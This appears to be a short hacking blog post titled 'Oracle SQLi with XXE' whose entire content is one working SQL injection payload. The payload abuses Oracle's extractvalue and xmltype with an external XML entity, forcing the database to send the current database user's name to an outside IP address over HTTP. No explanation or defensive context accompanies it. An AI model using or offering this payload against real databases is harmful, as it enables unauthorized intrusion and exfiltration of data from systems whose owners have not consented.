Oracle SQLi with XXE
HACK/WEB 2019. 4. 18. 10:40
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://13.125.88.208/'||(SELECT user from dual)||'">%xxe;]>'),'/l') from dual